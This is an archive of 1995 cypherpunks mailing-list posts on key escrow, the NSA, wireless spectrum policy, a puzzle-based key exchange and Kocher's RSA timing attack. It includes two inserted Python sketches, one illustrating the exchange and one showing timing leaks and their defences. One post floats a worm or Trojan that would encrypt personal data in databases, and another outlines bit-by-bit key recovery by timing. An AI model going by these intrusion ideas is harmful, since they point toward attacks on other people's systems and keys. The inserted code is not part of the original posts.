    When I bought it a year or so ago, I also looked at another phone
from (I think) Uniden, which *was* frequency agile. I was intrigued
enough to call the manufacturer, and confirmed that it did indeed
hop frequencies while the call was underway. How often, and
how the next frequency was determined was not known by the 
guy I talked to, and I balked at the $350 price. 

speaking for myself

Peter Trei
trei@process.com

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 16 Dec 1995 13:55:30 +0800
To: llurch@networking.stanford.edu (Rich Graves)
Subject: Re: .PWL spin
In-Reply-To: <Pine.ULT.3.91.951215142347.14138O@Networking.Stanford.EDU>
Message-ID: <9512160258.AA17014@all.net>
MIME-Version: 1.0
Content-Type: text


> > > What would make a University less secure than a corporation??
> > 
> > Ostensibly, universities in the interest of academic freedom and 
> > promoting learning usually don't have nearly the same draconian measures 
> > that corporations have.
> 
> More to the point, us poor professional staff don't stand a chance 
> politically against students and faculty. We support whatever they want 
> to use.
> 
> I think it's more an issue of control. Ford IS can say Thou Shalt Not
> turn on SAP advertisement, and people will listen (or go away). At major
> Universities, what we do with troublemakers is, we hire them.

I think your impression of the corporate work environment is a bit naive,
just as most people in the commercial environment have misimpressions about
university environments.

In universities, the faculty rules - sort of.  The administration also
has a great deal of power as is usually wielded by the deans.  In
corporations there are often several levels of management, each with
control and responsibility.

Just as a university president has little chance of success in ordering
something that is viewed by the faculty as a breach of privacy or heavy
handed action, the CEO of most companies is similarly constrained.  In
fact, it would be rare that either would get involved in this level of
decision. 

If Ford IS said "Thou Shalt Not turn on SAP advertisement" and someone
in Ford's engineering department had a requirement for SAP advertisement
in order to service a major customer, the IS department would fail (and
the person responsible for making the decision might be surprised at how
fast the human resources department can act).

> But back to the point, the anonymous (cypherpunk relevance) "system 
> administrator" (guess they couldn't find anyone willing to make a fool 
> of himself on the record?) who said that Universities would be hurt more 
> was wrong. We just don't have passwords on Win95 machines, or don't care 
> if they're compromised. It's the people at Ford, Dow, and Sprint, 
> which had wasted man-years putting together "policies" and "user 
> profiles" that have proven to be worse than useless, who are pissed off. 

In my experience, it is rarely the case that either a university or a
business is well protected.  Comparing one to the other is probably not
very useful.

One thing is for certain, however.  The vast majority of the professors
in computer science don't understand anything of substance about
information protection.  If you tried to tell them about it, chances are
they would rebuff you for your attempt.  Furthermore, professors of
computer science almost never perform systems administration duties for
the university computer center.  The computer center is almost always
run by professional staff not affiliated with the computer science
department. 

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@cnw.com>
Date: Sun, 17 Dec 1995 08:25:08 +0800
To: "'cypherpunks@toad.com>
Subject: taking electronic privacy into our own hands
Message-ID: <01BACBCB.01742B20@king1-21.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


	Would it be possible to write a program ( i.e. a worm or Trojan)  to ferret out personal information that is stored in databases and encrypt it?
I was just wondering what such an undertaking would entail.

Eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tkalil@ARPA.MIL (Tom Kalil)
Date: Sat, 16 Dec 1995 14:10:14 +0800
To: cypherpunks@toad.com
Subject: Status of Apple proposal for wireless NII Band
Message-ID: <acf7b409000210041c11@[192.48.218.187]>
MIME-Version: 1.0
Content-Type: text/plain


The Administration sent a letter to the FCC asking that they move forward
on the Apple and WinForum petitions.

The Administration's reasons for supporting the allocation are given
below.  The full filing is on the NTIA server at http://www.ntia.doc.gov


>>
>>
>>                                    November 2, 1995
>>
>> The Honorable Reed Hundt
>> Chairman
>> Federal Communications Commission
>> 1919 M Street, N.W.
>> Washington, D.C.  20554
>>
>>      Re:  RM 8648, RM 8653
>>
>> Dear Chairman Hundt:
>>
>>      This letter addresses the petitions for rulemaking filed
>> before the Commission in May 1995 by the Wireless Information
>> Networks Forum (WINForum) and Apple Computer Company, Inc.[1]
>> Those petitions request the allocation of certain spectrum in the
>> 5 GHz band and the adoption of service rules for shared
>> nonlicensed personal radio network devices.  Both the WINForum
>> Shared Unlicensed Personal Radio Network (SUPERnet) devices and
>> the Apple National Information Infrastructure (NII) Band devices
>> would allow operation of nonlicensed, high-speed, wireless
>> networks with multimedia capabilities.  NTIA believes that these
>> new wireless technologies have the potential to enhance education
>> and other community services.  Implementation of these networks
>> and the feasibility of spectrum sharing between the proposed
>> devices and Federal users should thus be fully explored by the
>> Commission.  We therefore recommend that the Commission proceed
>> with a Notice of Proposed Rulemaking (NPRM) so that the policy
>> and technical issues raised by the petitions may be addressed.
>>
>>      NTIA serves as the principal adviser to the President on
>> telecommunications and information issues, including the
>> Administration's NII and Global Information Infrastructure
>> initiatives.  In addition, as Federal spectrum manager, NTIA
>> shares with the Commission jurisdiction over the frequency bands
>> under discussion in the petitions.  NTIA believes that the
>> proposed WINForum and Apple devices could provide an important
>> means of nonlicensed wireless access to the NII.  Wireless
>> networks can be more affordable than wired networks.  Schools,
>> hospitals, businesses, and others would thus have convenient
>> access to communications networks with voice, video, data, and
>> graphics capabilities without the expense and disruption that
>> installing wired systems would require.
>>
>>      As you know, the President and Vice President have launched
>> an important initiative to connect all of our classrooms,
>> libraries, hospitals, and clinics to the NII by the year 2000.
>> This initiative, which promotes expanded access to computers,
>> teacher training, and the development of compelling educational
>> applications, has the potential to revolutionize our educational
>> system, changing the way teachers teach and students learn.
>> Students will be able to collaborate with their peers around the
>> world, search digital libraries, use remote scientific
>> instruments, and take "field trips" to on-line museums.  As
>> President Clinton said in a recent speech, "[e]very child in
>> America deserves the chance to get the high-tech know-how to
>> unlock the promises of the 21st Century."
>>
>>      For this reason, the Administration strongly supports
>> spectrum policies that will promote affordable, high-bandwidth
>> wireless computer networks.  Wireless networks, and nonlicensed
>> networks in particular, can be a cost-effective approach for the
>> countless schools in our Nation that need connections to the NII
>> to enhance learning opportunities and provide young Americans
>> with the skills they will need in the future.  Wireless networks
>> may be an important option for schools because they often face
>> limited budgets and are prevented from entering the Information
>> Age by inadequate wiring.  Furthermore, the proposed devices
>> could allow more students to have network access directly at
>> their desks in their classrooms instead of in computer labs in
>> other rooms.
>>
>>      Other users will benefit from nonlicensed wireless networks
>> as well.  Small businesses that lack adequate wiring and that
>> cannot afford access to wired networks could have affordable,
>> convenient wireless access to multimedia networks.  Such access
>> could enhance productivity and efficiency.  Health care providers
>> would have the ability to transmit patient data, such as x-rays
>> and MRI images, video recordings, medical charts, and other
>> records, which would dramatically improve the efficiency of
>> medical staff and ease the group diagnosis of medical cases.
>> Moreover, NTIA believes nonlicensed wireless components of the
>> NII will provide significant opportunities for innovators and
>> small companies to make contributions to the overall mix of
>> products and services available through the NII.[2]
>>
>

*********************************************************************
Thomas Kalil
Director to the National Economic Council
The White House
Washington, DC 20500
(p) (202) 456-2802
(f) (202) 456-2223

"What do we want?  Bandwidth!  When do we want it?  Now!"
*********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sat, 16 Dec 1995 19:32:42 +0800
To: cypherpunks@toad.com
Subject: The Elevator Problem & Groucho's Duck
Message-ID: <199512160537.AAA23233@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Dec 14, 1995 04:44:12, 'futplex@pseudonym.com (Futplex)' was kind enough
to respond to my post on the elevator problem. 
 
I thought his response was insightful and appropriate but that the
description of the problem had changed a bit since the problem was first
posed. 
 
Thus this post. 
 
I've been thinking of the old game show hosted by Groucho Marx. You would
"say the secret word and win $100." 
 
Getting the $100 was easy. The duck would drop down on a string with the
money in its beak and you'd just pluck it out. Saying the secret word was
also an easy problem to hack. You could just read the dictionary. Of course
this hack didn't work in real time because the show only lasted 30 minutes,
Groucho did most of the talking, and you had to say the secret word in
normal conversation. All of this rather "limited the bandwidth." 
 
The elevator problem remains somewhat undefined as a problem. Several
parameters are boundaries within which the basic problem must be solved.
Two parameters are the length of time Alice and Bob will spend coupled
against the desired level of security. 
 
Highly specific solutions are effectively impossible until these parameters
are defined (or at least approximated). 
 
However ... 
 
My original solution involved a variation of Merkle's non-patented puzzles.
Futplex stated, correctly, that this took a goodly amount of time to
generate and transmit the puzzles and the security was "not so hot." 
 
My mind still returns to Merkle and the idea of solving the original
elevator problem that could be geometric for Alice and Bob while being
exponential for the other people on the elevator. The more I tried to focus
on this aspect of the problem the more I just repeated the problem in my
own mind. 
 
I felt that I was trapped in a "maze of twisty little passages, all the
same." 
 
At this point, this holiday season, I had an image of Merkle sitting by the
tree putting an infinite number of prime numbers in an infinite number of
boxes. (In the real world I've been fighting with my landlord and suddenly
thought of Cantor's first description of the landlord's dilemma where a
landlord has an infinite number of rooms, all full, when another guest
shows up and wants a room.) 
 
At this point, I suddenly had an image of Cantor sitting on the floor next
to Merkle. Merkle would pack an infinite number of boxes and hand each box
to Cantor who would proceed to wrap each box in an infinite number of
sheets of wrapping paper. 
 
Suddenly, I saw that my first suggested solution put all of the major work
on Alice. She had to generate 10^6 prime pairs and send them all to Bob
then brute force an average of (10^6)/2 attempts to discover the one pair
Bob picked to factor. 
 
This process *might* be speeded up if Bob would, Cantor-like, help out. In
other words, have Alice generate and transmit 10^3 prime pairs and have Bob
do the same. This cuts transmission time by 5*(10^5), a considerable
savings. 
 
Then Alice and Bob each have to brute force an average of 5*(10^2) attempts
to discover each others primes, for a similar savings. 
 
However, you still need a nonpatented algorithm that lets them use the four
primes to encypher their message(s) while forcing the others on the
elevator to factor an average of (10^3^2)/2 products instead of
2*((10^3)/2). 
 
This is still very far from a solution to the elevator problem as re-posed
by Futplex but creates at least one way of *potentially* shortening the
prime generation and transmission time issue he was kind enough to point
out. 
 
I now feel that I am only "trapped in a maze of twisty little passages, all
different." 
 
Comment, Futplex? 
 
--tallpaul 
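
The first scheme described in the post above (Alice sends products of prime pairs, Bob factors one, Alice searches her own list for the pair Bob used), as an added sketch that is not part of the original message. The prime range, the SHA-256 key derivation, the HMAC confirmation tag and all function names are assumptions made for illustration; the post specifies none of them.

```python
import hashlib
import hmac
import random


def primes_between(lo, hi):
    """Sieve of Eratosthenes: primes p with lo <= p < hi."""
    sieve = bytearray([1]) * hi
    sieve[0:2] = b"\x00\x00"
    for i in range(2, int(hi ** 0.5) + 1):
        if sieve[i]:
            sieve[i * i::i] = bytearray(len(range(i * i, hi, i)))
    return [p for p in range(lo, hi) if sieve[p]]


def factor(n):
    """Trial division on n = p*q. Returns (p, q, divisions_tried)."""
    tried, d = 0, 2
    while d * d <= n:
        tried += 1
        if n % d == 0:
            return d, n // d, tried
        d += 1
    raise ValueError("n has no nontrivial factor")


def key_from(p, q):
    """Assumed key derivation: hash of the ordered prime pair."""
    lo, hi = sorted((p, q))
    return hashlib.sha256(f"{lo}:{hi}".encode()).digest()


def tag(key):
    """Assumed confirmation value Bob says aloud so Alice can find his pair."""
    return hmac.new(key, b"elevator-confirm", hashlib.sha256).digest()


def alice_make_puzzles(n_puzzles, rng):
    """Alice keeps the pairs secret and transmits only the products."""
    pool = primes_between(10_000, 20_000)  # toy size so factoring is quick
    pairs, seen = [], set()
    while len(pairs) < n_puzzles:
        pair = tuple(sorted(rng.sample(pool, 2)))
        if pair not in seen:
            seen.add(pair)
            pairs.append(pair)
    return pairs, [p * q for p, q in pairs]


def bob_pick_and_solve(products, rng):
    """Bob factors ONE product of his choosing and derives the key."""
    p, q, work = factor(rng.choice(products))
    key = key_from(p, q)
    return key, tag(key), work


def alice_find_key(pairs, confirm):
    """Alice already knows every pair: one cheap hash per candidate."""
    for tries, (p, q) in enumerate(pairs, 1):
        key = key_from(p, q)
        if hmac.compare_digest(tag(key), confirm):
            return key, tries
    raise LookupError("tag matches none of Alice's pairs")


def eve_find_key(products, confirm):
    """The eavesdropper heard products and tag; she must factor to test each."""
    total = 0
    for count, n in enumerate(products, 1):
        p, q, work = factor(n)
        total += work
        key = key_from(p, q)
        if hmac.compare_digest(tag(key), confirm):
            return key, count, total
    raise LookupError("tag matches none of the products")


def run_exchange(n_puzzles=100, seed=1995):
    rng = random.Random(seed)  # seeded only so the demo is repeatable
    pairs, products = alice_make_puzzles(n_puzzles, rng)
    bob_key, confirm, bob_work = bob_pick_and_solve(products, rng)
    alice_key, alice_tries = alice_find_key(pairs, confirm)
    eve_key, eve_factored, eve_work = eve_find_key(products, confirm)
    return {
        "alice_key": alice_key, "bob_key": bob_key, "eve_key": eve_key,
        "alice_tries": alice_tries, "bob_work": bob_work,
        "eve_factored": eve_factored, "eve_work": eve_work,
    }


if __name__ == "__main__":
    r = run_exchange()
    print("Bob divisions:", r["bob_work"])
    print("Alice hash lookups:", r["alice_tries"])
    print("Eve factored", r["eve_factored"], "products,", r["eve_work"], "divisions")
```

The eavesdropper still recovers the key; her expected cost is about N/2 factorizations against Bob's one, so the advantage grows only linearly with the number of products Alice sends.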
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 16 Dec 1995 18:38:12 +0800
To: cypherpunks@toad.com
Subject: Re: e$: Seven Days
Message-ID: <acf7d93b0a02100457f7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:32 AM 12/16/95, Robert Hettinga wrote:

[much elided]

>This is an honest-to-goodness, straight out of the Whole-Earth Domebook,
>back to the land, llamas-and-all geodesic dome, complete with naked
>hippies in the hot tub. I come to the conclusion that this is going to

I was one of the "naked hippies in the hot tub," for a couple of hours or so.


>This chair now had another guy sitting in it, and, as I had been doing
>all evening,  I introduced myself, by way of retrieving my Powerbook. It
>was Tim May.
>
>I laughed, and shook his hand goodbye, which must have puzzled him a
>bit, got my Mac from behind him, and split.  Tim May looks much
>different in person than he does on the net. On the net, he's this
>short, skinny-but-muscular, pushy guy with no beard who looks too young
>for his age. In person, he's exactly the opposite on all counts. Gooo
>figure.

???

Yes, I was surprised it was Bob, as I hadn't heard he was there. But, then,
I had been in the hot tub and was in a state of torpor even afterwards.
Also, I tend to sit and not partake of the frenzied shmoozing which so
often occurs at these parties.

I probably would've encountered Bob earlier if people were doing what I
urge them to do at my parties: wear name tags. (I have a pile of name tags
and suggest to people that wearing them is completely "voluntary" in the
true sense--not the Newspeak GAK sense--and that they can of course choose
to remain unknown to others. This helps greatly in recognizing and
remembering names, and it's too bad name tags have been tagged as "uncool"
by so many.)

I guess to an outsider this party at the geodesic dome in the Santa Cruz
mountains must've seemed like the canonical California experience, complete
with hot tubs, redwoods, programmers, writers, etc. To us, it's just
normal.

By the way, in honor of the "geodesic network" and "geodesic payment
systems," and the geodesic dome the party was in, I propose we rename "e$"
with a more fitting name: "buckybucks." Or just "buckys" for short. ("Did
you remember to replenish the buckybits?")

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Sat, 16 Dec 1995 14:07:05 +0800
To: "David E. Smith" <Cypherpunks@toad.com>
Subject: Re: The Elevator Problem
Message-ID: <199512160410.XAA06462@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Dec 1995 09:11:45 -0600, David E. Smith wrote:

[..]

>The way I understand the system, in order for Alice to have Bob's key (and
>vice versa) they each have to transmit a considerable amount of data about
>their keys.  Even if those data are in the form of "twenty questions," neither
>knows anything about the other's key at the start.  Is there something
>painfully obvious that I'm missing?

Oddly enough, I saw this posted the same night I saw the timing-attack
against RSA announced.  Is there  a connection here?

If we assume a hypothetical future where the current families of
public key encryption can be easily broken, anyhow...

--Mutant Rob






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Sun, 17 Dec 1995 00:34:53 +0800
To: cypherpunks@toad.com
Subject: DEC Alta Vista
Message-ID: <199512161557.HAA25530@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Check out Digital's new Web and newsgroup search engine at:

http://www.altavista.digital.com/

Makes OpenText, Lycos, etc. look like turtles.

Crypto-relevance: The spider they used appears to have fully indexed the
HTML Cypherpunk list archive.  Extremely fast searches on your favorite
topics...

Joel





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 17 Dec 1995 05:19:38 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: NIST GAK meeting writeup, LONG part 3 of 3
Message-ID: <m0tR2sj-0008y9C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:48 PM 12/14/95 -0500, you wrote:
>jim bell writes:
>> It _is_ less voluntary, because it interferes with my right to escrow my key
>> with an organization that is willing to take the dispute to arbitrary levels
>> of uncooperativeness with the government.  I might insist, for example, that
>> the organization only store the key outside the country (beyond the reach of
>> US Courts) and require MY PERMISSION for them to release it to the
>> government.  I might also insist that they further encode the key so that
>> only an independent foreign organization (out of reach of US courts) could
>> provide the key to decrypt it.
>> 
>> If key escrow is REALLY REALLY REALLY "voluntary", then such arbitrary
>> restrictions should be do-able.
>
>Unless I've missed something large, you can have an _uncertified_ key escrow 
>agent store your keys in Fidel Castro's beard, and only release them with
>written permission from your goldfish. 
>
>Whether or not you use a certified key escrow agency would remain your 
>choice, AFAIK.
>
>I'm not expressing support for the certification standards that have been
>presented. But I don't consider it cause for great alarm that the USG wants
>to play in the escrow agent rating bureau business.

Here's the problem:  "Clipper" ALREADY isn't "voluntary," because the public
has already been forced to pay for its development via  stolen tax dollars.
At least hypothetically, the government could misuse its discretion even
further to push a Clipper-like solution, in order to skew the market against
the adoption of good encryption.  Follow me so far?  They could go as far as
to subsidize Clipper-installed telephones, making them cost $50 at your
local discount store, competitive with non-crypto phones. 

Okay, I presume that the  company that makes Clipper chips (VLSI Technology)
must ultimately sell them, UNPROGRAMMED, to manufacturers who are to build
those  telephones.  I see a business opportunity to act as a VOLUNTARY
escrow agent, but one that only agrees to keep the keys for the chips for
"30 feet or 30 seconds."  In other words, build (or modify) Clipper-type
telephones with chips that are ostensibly escrowed, but due to the agreement
with the end user the keys will be erased.  (Or, the keys will be kept
encrypted, unbreakably, with the "key to the key" given to the end user, who
will presumably burn it on receipt.)

What I _DON'T_ want to see happen is for the USG to be able to refuse
escrow-agent status to an organization which is actively hostile to the
concept of key escrow, an organization  which is willing to work with
end-users to thwart the USG's access  to products which (due to the fact
they were never exported) do not fall under any ITAR-type regulations. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 17 Dec 1995 05:50:59 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Netscape announces position against GAK
Message-ID: <m0tR37i-0008zsC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:16 AM 12/9/95 -0800, you wrote:

>http://home.netscape.com/newsref/ref/encryption_export.html
>
>>   NETSCAPE PRESENTS POLICY ON ENCRYPTION EXPORT TO KEY MEMBERS OF THE
>>                      ADMINISTRATION AND CONGRESS
>> 
>> ----------------------------------------------------------------------
>> 
>> This week Netscape representatives attending a government presentation
>> of the administration's proposed Key Escrow Policy for Export detailed
>> the company's firm opposition to the proposed policy. Netscape is
>> opposed to this type of proposal for a number of reasons including its
>> failure to adequately address the issues of acceptability by foreign
>> governments and corporations, significant personal privacy concerns,
>> and the mandatory nature of tying the Exportable Key Size to the Key
>> Escrow Proposal.
[rest of position deleted]

While this may be a reasonably good start, what I would have preferred that
you say is that if any kind of GAK system is adopted, either foreign or
domestic, you as a corporation would ENTHUSIASTICALLY do everything in your
power to  (_legally_) circumvent, undermine, sabotage, neutralize, and
counteract whatever goals the US government has with regard to implementing
GAK. In other words, while you might stay barely within the letter of the
law, you would tirelessly exploit every possible loophole (both legal and
technical) to ensure that the government NEVER gets its way.  

I feel certain that with a few imaginative lawyers and programmers (both
foreign and domestic), it should be possible to turn this into a "nightmare
scenario" for the government.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 17 Dec 1995 07:01:12 +0800
To: pcw@access.digex.net (Peter Wayner)
Subject: Re: More Balto Sun on the NSA: Infowar
In-Reply-To: <v02130500acf7d6f1eacc@[199.125.128.5]>
Message-ID: <199512162211.OAA07646@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


PW on the NSA:

>The article also has some anecdotes about how the agency
>protected US firms abroad. One company was alerted that its
>European competitor was bribing the Latin American officials who
>were choosing the winning bid. Also, when the Peso collapsed,
>the US negotiators had access to some information that the
>Mexican government wasn't being as forthcoming as they should
>have been about the country's assets. They used this information
>in negotiations.

I'd like to point out how specious this supposed "benefit" is if
the NSA is actually now involved in economic espionage areas as this implies.
(@#$%^&*, I must have missed the senate meeting where they modified the 
charter, maybe it was the same one where they came up with Clipper)

suppose you get a message from our government with the implication
it came from the NSA: "Mr. businessman, we have information that so-and-so
bidder is involved in bribery". 

well, what can you do with this? why should
you give it any merit? the NSA has its own hidden agenda. they could be
saying things to netscape like, "so-and-so cryptography is not secure.
don't use it". should netscape listen to them? isn't it obvious there
could be a conflict of interest, to say the least, and a delightful
opportunity for further spook "shadow" manipulation techniques, which
they get their wet dreams about?

the problem is that many businessmen are just as gullible and braindead
as the american public, and will roll over or listen with rapt attention
just like americans do when they hear the phrase, "national security".

there are many businessmen who think they are being "patriotic" by listening
to their government and cooperating with it in shadowy deals for the 
purpose of promoting "national security". frankly I think this is as
close to being a traitor to the true spirit of democracy as one can come
without ever being considered one by rational adults. (oh, well, the
distinction about rational adults has somewhat blurred in this century..)
Eisenhower's "military industrial complex" actually has the initials NSA..

so frankly, I would recommend that any businessmen who get "shadow"
tips from the government about how to run their business like PW describes
to tell them to ---- off. unless you're a patriot of course. then you
should turn me in for writing this message.

if the government actually had proof about their claims, that would be 
a different story. then I'd tell them to "---- off" *after* I got the
relevant info <g> .. but seriously this is not going to be a problem with
spooks, who love the following style of proof and information transmission:

"[x] is true because we know it is true, but exactly why is a matter of 
national security which we can't tell you. nevertheless because of [x] you 
should do [y]. in fact you are compelled to do it as a US patriot." 

just call it "proof by spook phlegm"

that's what we now have: a government of, by, and for the @#$%^&* spooks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jadestar@netcom.com (JaDe)
Date: Sun, 17 Dec 1995 06:56:40 +0800
To: joelm@eskimo.com (Joel McNamara)
Subject: Re: DEC Alta Vista
In-Reply-To: <199512161557.HAA25530@mail.eskimo.com>
Message-ID: <199512162218.OAA06706@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Check out Digital's new Web and newsgroup search engine at:
> 
> http://www.altavista.digital.com/
> 
> Makes OpenText, Lycos, etc. look like turtles.
> 
> Crypto-relevance: The spider they used appears to have fully indexed the
> HTML Cypherpunk list archive.  Extremely fast searches on your favorite
> topics...
> 
> Joel

	I'm impressed.  I accessed it in Lynx and it was
	*perfect* -- not a single inline <IMG> without an 
	appropriate Alt= attribute.

	As a quick test I did a search on something that I 
	knew I'd posted to the comp.lang.awk newsgroups within
	the last couple of days.  It found them almost
	instantly (except that it was apparently arranged 
	chronologically -- so I had to hunt through several pages
	of [Next Set of Matches] links to find my stuff).

	(Sorry no cypher relevance I can add to this -- but 
	put that URL in your bookmarks folks).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmcurtin@goffer.cb.att.com (C Matthew Curtin)
Date: Sun, 17 Dec 1995 06:20:06 +0800
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: Encrypted telnet...
In-Reply-To: <9512151848.AA20590@spirit.aud.alcatel.com>
Message-ID: <9512162147.AA04565@goffer.cb.att.com.cb.att.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Dan> I am looking for an encrypted telnet (or rlogin/etc) package
Dan> that supports a Windoze client.  

You might want to check into STEL from CERT-IT; in their paper
describing it, they note that ports exist (as of June '95) on
HPUX, SunOS, IRIX, Solaris, and Linux. Since you mentioned an
interest in hacking some code yourself, you might want to see
if you could make a Windows port of their client.

STEL should be available via anonymous ftp at
	ftp://ftp.dsi.unimi.it/pub/security/cert-it/stel.tar.gz

CERT-IT can be found on the web at
	http://idea.sec.dsi.unimi.it/cert-it.html

...and the authors of the STEL paper, and their email addresses
are:

	David Vincenzetti	vince@dsi.unimi.it
	Stefano Taino		taino@dsi.unimi.it
	Fabio Bolognesi		bolo@dsi.unimi.it

- -matt

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNM+fBhyYuO2QvP9AQFarAP6A8wZqzf3sCCKmloZOTiWQRIv/puvUwmq
5wn1t0tzosMRW2VeKhluAwd/cNMywe0j4mpRzBLDKXgXp5/lMMR+99yAgXnRLXgK
7WHG4Qgvx/IMFLl0rOfvOpkDoLvXk4fWYM0gU8eTEf8Vja/ZsTo9rJ1Tq/JlRpn9
Mo4Z/QYFzMM=
=cezv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jonathan M. Bresler" <jmb@FreeBSD.ORG>
Date: Sun, 17 Dec 1995 08:01:27 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: kocher's timing attack
In-Reply-To: <199512151457.GAA27245@jobe.shell.portal.com>
Message-ID: <Pine.BSF.3.91.951216181017.28505B-100000@Aspen.Woc.Atinc.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Dec 1995, Hal wrote:

> As Kocher's paper implies, the known ciphertext attack is a TIMING
> attack.  Simply accumulating known text/signature pairs as you would have
> after a "key signing party" does not help.  You must know exactly how
> much time each signature took.

	how to use a timing attack?  across a network?  on the same host 
(therefore multiuser)?   or on a dedicated host, with a known algorithm 
and known ciphertext running DOS (no kernel or anything to preempt the 
process)?   using the famous appendix H registers of a 586 allows you to 
time the processing of instructions very well.

	don't have to know how long it takes to encrypt ahead of time.  
walk the key bit by bit (ouch bad pun) guessing 1 or 0 each time and 
looking to see if the correlations continue to appear or not.  horrendous 
problem, but a lot better than brute force.

	i really need to read the final paper when it is issued.

jmb

Jonathan M. Bresler        FreeBSD Postmaster         jmb@FreeBSD.ORG
play go. ride bike. hack FreeBSD.--ah the good life 
i am moving to a new job.                 PLEASE USE: jmb@FreeBSD.ORG
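
A defender's view of the leak discussed in this thread, as an added example that is not part of the original post: plain square-and-multiply does key-dependent work, while a fixed operation schedule plus blinding removes the dependence an observer could correlate against. The toy key, the function names and the use of a multiplication count as a stand-in for time are assumptions made for illustration.

```python
"""Toy model of key-dependent work in RSA private-key operations, with two fixes.

Constructed example: the key is built from two Mersenne primes for illustration
only, and "time" is modelled as a count of modular multiplications.
"""
import secrets

P, Q = 2**61 - 1, 2**89 - 1          # constructed toy primes, not a real key
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))    # private exponent (Python 3.8+)
BITS = N.bit_length()


def square_and_multiply(base, exp, mod):
    """Left-to-right binary exponentiation; returns (result, multiplications).

    The extra multiply happens only for 1 bits, so the amount of work
    depends on the secret exponent.
    """
    result, ops = 1, 0
    for bit in bin(exp)[2:]:
        result = (result * result) % mod      # always square
        ops += 1
        if bit == "1":                        # key-dependent extra work
            result = (result * base) % mod
            ops += 1
    return result, ops


def montgomery_ladder(base, exp, mod, bits):
    """Fixed schedule: one multiply and one square per bit, for `bits` bits.

    This models the operation schedule only; Python big-integer arithmetic
    is not itself constant-time.
    """
    r0, r1, ops = 1, base % mod, 0            # invariant: r1 == r0 * base
    for i in range(bits - 1, -1, -1):
        if (exp >> i) & 1:
            r0, r1 = (r0 * r1) % mod, (r1 * r1) % mod
        else:
            r1, r0 = (r0 * r1) % mod, (r0 * r0) % mod
        ops += 2
    return r0, ops


def sign_blinded(m, d, e, n, bits):
    """RSA private-key operation with blinding.

    The exponentiation runs on m * r^e for a fresh random r, so its input
    is unknown to an observer and timings cannot be correlated with m.
    """
    while True:
        r = secrets.randbelow(n - 2) + 2
        try:
            r_inv = pow(r, -1, n)             # r must be invertible mod n
            break
        except ValueError:
            continue
    blinded = (m * pow(r, e, n)) % n
    s_blinded, ops = montgomery_ladder(blinded, d, n, bits)
    return (s_blinded * r_inv) % n, ops       # (m r^e)^d * r^-1 == m^d


if __name__ == "__main__":
    light = (1 << 127) | 1                    # 128-bit exponent, two 1 bits
    heavy = (1 << 128) - 1                    # 128-bit exponent, all 1 bits
    for name, exp in (("light", light), ("heavy", heavy)):
        _, naive = square_and_multiply(5, exp, N)
        _, fixed = montgomery_ladder(5, exp, N, 128)
        print(f"{name}: square-and-multiply={naive} ops, ladder={fixed} ops")
    sig, ops = sign_blinded(123456789, D, E, N, BITS)
    print("blinded signature verifies:", pow(sig, E, N) == 123456789, ops, "ops")
```
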





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Sun, 17 Dec 1995 08:26:12 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Is ths legal?...
Message-ID: <Pine.3.89.9512161825.A10054-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


I was told today that students at Oklahoma University have their computer
accounts subject to administrative inspection and that encryption (even
